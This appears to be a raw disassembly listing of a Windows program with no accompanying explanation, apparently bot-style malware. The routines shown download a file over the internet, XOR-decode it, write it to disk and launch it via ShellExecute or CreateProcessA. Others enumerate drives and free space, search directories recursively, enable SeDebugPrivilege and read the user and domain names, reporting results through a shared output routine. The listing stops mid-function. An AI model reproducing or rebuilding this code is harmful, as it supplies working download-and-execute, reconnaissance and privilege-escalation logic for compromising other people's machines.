jnz short loc_41700C
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
add esp, 14h
loc_41700C: ; CODE XREF: sub_416F62+88�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push [ebp+var_48]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_417029: ; CODE XREF: sub_416F62+68�j
xor edi, edi
call ds:dword_4F537C ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
loc_417043: ; CODE XREF: sub_416F62+1B4�j
push 200h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+Dst]
push 200h
push eax
push [ebp+var_18]
call dword_4E3004 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_417087
push [ebp+arg_0]
lea eax, [ebp+Dst]
push eax
call sub_417454
pop ecx
pop ecx
loc_417087: ; CODE XREF: sub_416F62+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+Dst]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4F53B4 ; WriteFile
cmp edi, ebx
jnb short loc_4170C5
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_4170AF
mov eax, [ebp+arg_0]
loc_4170AF: ; CODE XREF: sub_416F62+148�j
push eax ; Size
lea eax, [ebp+Dst]
push eax ; Src
mov eax, [ebp+Memory]
add eax, edi
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_4170C5: ; CODE XREF: sub_416F62+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_4170D2
cmp edi, [ebp+var_3C]
ja short loc_41711C
loc_4170D2: ; CODE XREF: sub_416F62+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_4170EC
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_44E91C
jmp short loc_4170FC
; ---------------------------------------------------------------------------
loc_4170EC: ; CODE XREF: sub_416F62+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset asc_44E944 ; "-"
loc_4170FC: ; CODE XREF: sub_416F62+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_455E18
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_417043
loc_41711C: ; CODE XREF: sub_416F62+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_417171
cmp edi, [ebp+var_3C]
jz short loc_417171
push [ebp+var_3C]
lea eax, [ebp+Dst]
mov [ebp+var_14], esi
push edi
push offset asc_44E96C ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
lea eax, [ebp+Dst]
push eax
call sub_415C3F
add esp, 28h
loc_417171: ; CODE XREF: sub_416F62+1C4�j
; sub_416F62+1C9�j
call ds:dword_4F537C ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_4F533C ; CloseHandle
push [ebp+Memory] ; Memory
call _free
cmp [ebp+var_38], esi
pop ecx
jz short loc_4171FB
lea eax, [ebp+Filename]
push eax ; Filename
call sub_4010AB
cmp eax, [ebp+var_38]
pop ecx
jz short loc_4171FB
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+Dst]
push offset asc_44E998 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
lea eax, [ebp+Dst]
push eax
call sub_415C3F
add esp, 28h
loc_4171FB: ; CODE XREF: sub_416F62+241�j
; sub_416F62+253�j
cmp [ebp+var_14], esi
jz loc_41743B
cmp [ebp+var_44], 1
jz loc_4172F6
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_43C490
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_43C490
fstp [esp+590h+var_590]
push offset asc_44E9C0 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_417276
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
add esp, 14h
loc_417276: ; CODE XREF: sub_416F62+2F2�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
cmp [ebp+var_40], 1
pop ecx
jnz loc_41743B
push 5
push esi
lea eax, [ebp+Filename]
push esi
push eax
push offset aOpen_2 ; "open"
push esi
call dword_4E3064
cmp [ebp+var_30], esi
jnz loc_41743B
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset asc_44EA00 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
lea eax, [ebp+Dst]
push eax
call sub_415C3F
add esp, 24h
jmp loc_41743B
; ---------------------------------------------------------------------------
loc_4172F6: ; CODE XREF: sub_416F62+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_43C490
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_43C490
fstp [esp+590h+var_590]
push offset asc_44EA1C ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_41735E
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
add esp, 14h
loc_41735E: ; CODE XREF: sub_416F62+3DA�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push 10h ; Size
lea eax, [ebp+var_10]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_310]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset dword_4EADD8
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+Filename]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_4F5340 ; CreateProcessA
cmp eax, edi
jnz short loc_4173E0
call dword_4E3050 ; WSACleanup
call sub_4190F6
push esi
call ds:dword_4F5338 ; ExitProcess
loc_4173E0: ; CODE XREF: sub_416F62+46A�j
lea eax, [ebp+Filename]
push eax
push offset unk_44EA60
jmp short loc_4173FA
; ---------------------------------------------------------------------------
loc_4173EE: ; CODE XREF: sub_416F62+45�j
lea eax, [ebp+var_248]
push eax
push offset asc_44EA94 ; "-"
loc_4173FA: ; CODE XREF: sub_416F62+48A�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_41742E
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D34
add esp, 14h
loc_41742E: ; CODE XREF: sub_416F62+4AA�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
pop ecx
loc_41743B: ; CODE XREF: sub_416F62+29C�j
; sub_416F62+325�j ...
push [ebp+var_18]
call dword_4E312C ; InternetCloseHandle
push [ebp+var_48]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
sub_416F62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417454 proc near ; CODE XREF: sub_416F62+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_417470
loc_417460: ; CODE XREF: sub_417454+1A�j
mov dl, byte_43F094
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_417460
locret_417470: ; CODE XREF: sub_417454+A�j
retn
sub_417454 endp
; =============== S U B R O U T I N E =======================================
sub_417471 proc near ; CODE XREF: sub_401CC7+58C2�p
; sub_401CC7+59EA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_421680
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_417471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41748B proc near ; CODE XREF: sub_4103EB+458�p
; sub_4103EB+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h ; Size
mov edi, offset dword_4EADDC
push 0 ; Val
push edi ; Dst
call _memset
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_4174B0: ; CODE XREF: sub_41748B+5B�j
; sub_41748B+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call __aullrem
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call __aulldiv
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_4174EE
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4174B0
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4174B0
; ---------------------------------------------------------------------------
loc_4174EE: ; CODE XREF: sub_41748B+4B�j
dec esi
mov eax, edi
loc_4174F1: ; CODE XREF: sub_41748B+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_417500
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_4174F1
; ---------------------------------------------------------------------------
loc_417500: ; CODE XREF: sub_41748B+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_41748B endp
; =============== S U B R O U T I N E =======================================
sub_41750A proc near ; CODE XREF: sub_4176CB+51�p
; sub_4176CB+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4E3158 ; GetDriveTypeA
sub eax, 0
jz short loc_41754D
dec eax
jz short loc_417547
dec eax
dec eax
jz short loc_417541
dec eax
jz short loc_41753B
dec eax
jz short loc_417535
dec eax
jz short loc_41752F
mov eax, offset dword_44EAEC
retn
; ---------------------------------------------------------------------------
loc_41752F: ; CODE XREF: sub_41750A+1D�j
mov eax, offset off_44EAE8
retn
; ---------------------------------------------------------------------------
loc_417535: ; CODE XREF: sub_41750A+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_41753B: ; CODE XREF: sub_41750A+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_417541: ; CODE XREF: sub_41750A+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_417547: ; CODE XREF: sub_41750A+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_41754D: ; CODE XREF: sub_41750A+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_41750A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417553 proc near ; CODE XREF: sub_41759B+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4E2FE8
test eax, eax
jz short loc_417588
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_417588: ; CODE XREF: sub_417553+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_417553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41759B proc near ; CODE XREF: sub_4176CB+17�p
; sub_41B92C+1F3�p
Dest = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_417553
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_41767E
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_41767E
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_41767E
mov edi, 400h
push 0
push edi
push [ebp+var_14]
push [ebp+var_18]
call __alldiv
push edx
push eax
call sub_41748B
pop ecx
mov esi, 80h
pop ecx
push eax
push offset aSkb ; "%sKB"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 0
push edi
push [ebp+var_C]
push [ebp+var_10]
call __alldiv
push edx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
push offset aSkb_0 ; "%sKB"
lea eax, [ebp+var_118]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 0
push edi
push [ebp+var_4]
push [ebp+var_8]
call __alldiv
push edx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
push offset aSkb_1 ; "%sKB"
lea eax, [ebp+var_98]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp short loc_4176B7
; ---------------------------------------------------------------------------
loc_41767E: ; CODE XREF: sub_41759B+2C�j
; sub_41759B+3B�j ...
lea eax, [ebp+Dest]
push offset aFailed ; "failed"
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_118]
pop ecx
push offset aFailed_0 ; "failed"
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_98]
pop ecx
push offset aFailed_1 ; "failed"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4176B7: ; CODE XREF: sub_41759B+E1�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+Dest]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_41759B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4176CB(int,char *Str,int,int)
sub_4176CB proc near ; CODE XREF: sub_41779D+17�p
; sub_41779D+60�p
Dest = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
Str1 = byte ptr -80h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_41759B
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+Str1]
push offset aFailed_2 ; "failed"
rep movsd
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
jnz short loc_41773E
push ebx
push ebx
call sub_41750A
pop ecx
push eax
push offset asc_44EB28 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_417772
; ---------------------------------------------------------------------------
loc_41773E: ; CODE XREF: sub_4176CB+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+Str1]
push eax
push ebx
push ebx
call sub_41750A
pop ecx
push eax
push offset asc_44EB64 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 20h
loc_417772: ; CODE XREF: sub_4176CB+71�j
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4176CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41779D(int,char *Str,int,int)
sub_41779D proc near ; CODE XREF: sub_401CC7+2544�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_4177BE
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_4176CB
add esp, 10h
jmp short loc_41781F
; ---------------------------------------------------------------------------
loc_4177BE: ; CODE XREF: sub_41779D+9�j
push esi
push edi
push ebx
push ebx
call dword_4E3060 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi ; Size
call _malloc
pop ecx
mov edi, eax
push edi
push esi
call dword_4E3060 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_417816
loc_4177E2: ; CODE XREF: sub_41779D+77�j
push offset aA_1 ; "A:\\"
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_417805
push esi ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_4176CB
add esp, 10h
loc_417805: ; CODE XREF: sub_41779D+54�j
push esi ; Str
call _strlen
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_4177E2
loc_417816: ; CODE XREF: sub_41779D+43�j
push edi ; Memory
call _free
pop ecx
pop edi
pop esi
loc_41781F: ; CODE XREF: sub_41779D+1F�j
pop ebx
pop ebp
retn
sub_41779D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417822 proc near ; DATA XREF: sub_401CC7+6920�o
Dest = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = dword ptr -218h
var_115 = byte ptr -115h
Str = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+Str]
push eax ; Str
call _strlen
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_417877
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_115], bl
loc_417877: ; CODE XREF: sub_417822+3F�j
lea eax, [ebp+var_218]
push eax
push offset asc_44EBA4 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4178BC
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; Str
push [ebp+var_29C] ; int
call sub_409D34
add esp, 14h
loc_4178BC: ; CODE XREF: sub_417822+78�j
lea eax, [ebp+Str]
push ebx ; int
push eax ; int
lea eax, [ebp+var_218]
push eax ; int
lea eax, [ebp+var_298]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_29C] ; int
call sub_41793D
add esp, 18h
push eax
lea eax, [ebp+Dest]
push offset asc_44EBCC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_41791D
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; Str
push [ebp+var_29C] ; int
call sub_409D34
add esp, 14h
loc_41791D: ; CODE XREF: sub_417822+D9�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_417822 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41793D(int,char *Str,int,int,int,int)
sub_41793D proc near ; CODE XREF: sub_417822+B9�p
; sub_41793D+9C�p
var_548 = dword ptr -548h
var_348 = dword ptr -348h
Dest = byte ptr -244h
var_140 = byte ptr -140h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 548h
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+Dest]
push offset aS_29 ; "%s\\*"
push esi ; Count
push eax ; Dest
call __snprintf
mov edi, ds:dword_4F53F0
add esp, 10h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4179F6
loc_417983: ; CODE XREF: sub_41793D+B7�j
test [ebp+var_140], 10h
jz short loc_4179E4
cmp [ebp+var_114], 2Eh
jnz short loc_4179A7
cmp [ebp+var_113], 0
jz short loc_4179E4
cmp [ebp+var_113], 2Eh
jz short loc_4179E4
loc_4179A7: ; CODE XREF: sub_41793D+56�j
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_348]
push [ebp+arg_10]
push offset aSS_9 ; "%s\\%s"
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+arg_14] ; int
lea eax, [ebp+var_348]
push eax ; int
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_41793D
add esp, 2Ch
mov [ebp+arg_14], eax
loc_4179E4: ; CODE XREF: sub_41793D+4D�j
; sub_41793D+5F�j ...
lea eax, [ebp+var_140]
push eax
push ebx
call ds:dword_4F53EC ; FindNextFileA
test eax, eax
jnz short loc_417983
loc_4179F6: ; CODE XREF: sub_41793D+44�j
push ebx
mov ebx, ds:dword_4F53E0
call ebx ; FindClose
push [ebp+arg_C]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSS_10 ; "%s\\%s"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_417A80
loc_417A31: ; CODE XREF: sub_41793D+141�j
lea eax, [ebp+var_114]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_548]
push [ebp+arg_10]
push offset asc_44EC04 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+var_548]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 28h
lea eax, [ebp+var_140]
push eax
push esi
call ds:dword_4F53EC ; FindNextFileA
test eax, eax
jnz short loc_417A31
loc_417A80: ; CODE XREF: sub_41793D+F2�j
push esi
call ebx ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41793D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A8B proc near ; DATA XREF: sub_401CC7+1CC0�o
Dest = byte ptr -29Ch
var_9C = dword ptr -9Ch
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_41B7D8
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_417ACA
cmp eax, 2
jz short loc_417ACA
push offset unk_44EE04
jmp loc_417C09
; ---------------------------------------------------------------------------
loc_417ACA: ; CODE XREF: sub_417A8B+2E�j
; sub_417A8B+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41A51E
pop ecx
test eax, eax
pop ecx
jz loc_417C04
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_4F538C ; LoadLibraryA
mov esi, ds:dword_4F5390
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4EC020, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_4EC014, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_4EC224, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_4EC01C, eax
call esi ; GetProcAddress
mov dword_4EC018, eax
call sub_417C5D
test eax, eax
mov [ebp+arg_0], eax
jz loc_417BD7
mov esi, ds:dword_4F52D4
mov edi, 400h
mov ebx, offset word_4EB014
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset word_4EB814
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_4EC22C
push [ebp+arg_0]
jnz short loc_417B83
call sub_417DE6
jmp short loc_417B88
; ---------------------------------------------------------------------------
loc_417B83: ; CODE XREF: sub_417A8B+EF�j
call sub_417F8D
loc_417B88: ; CODE XREF: sub_417A8B+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_417BD0
cmp dword_4EC22C, 0
jnz short loc_417BB7
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset asc_44ECFC ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp short loc_417BEA
; ---------------------------------------------------------------------------
loc_417BB7: ; CODE XREF: sub_417A8B+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_417BC7
call sub_4180C3
jmp short loc_417BCC
; ---------------------------------------------------------------------------
loc_417BC7: ; CODE XREF: sub_417A8B+133�j
call sub_41815A
loc_417BCC: ; CODE XREF: sub_417A8B+13A�j
pop ecx
push eax
jmp short loc_417BDC
; ---------------------------------------------------------------------------
loc_417BD0: ; CODE XREF: sub_417A8B+101�j
push offset unk_44ED58
jmp short loc_417BDC
; ---------------------------------------------------------------------------
loc_417BD7: ; CODE XREF: sub_417A8B+B6�j
push offset asc_44ED90 ; "-"
loc_417BDC: ; CODE XREF: sub_417A8B+143�j
; sub_417A8B+14A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_417BEA: ; CODE XREF: sub_417A8B+12A�j
push 0
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
call sub_41A51E
pop ecx
pop ecx
push [ebp+var_8]
call ds:dword_4F5410 ; FreeLibrary
pop ebx
jmp short loc_417C17
; ---------------------------------------------------------------------------
loc_417C04: ; CODE XREF: sub_417A8B+4E�j
push offset asc_44EDD0 ; "-"
loc_417C09: ; CODE XREF: sub_417A8B+3A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_417C17: ; CODE XREF: sub_417A8B+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_417C3E
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_9C] ; int
call sub_409D34
add esp, 14h
loc_417C3E: ; CODE XREF: sub_417A8B+191�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_18]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
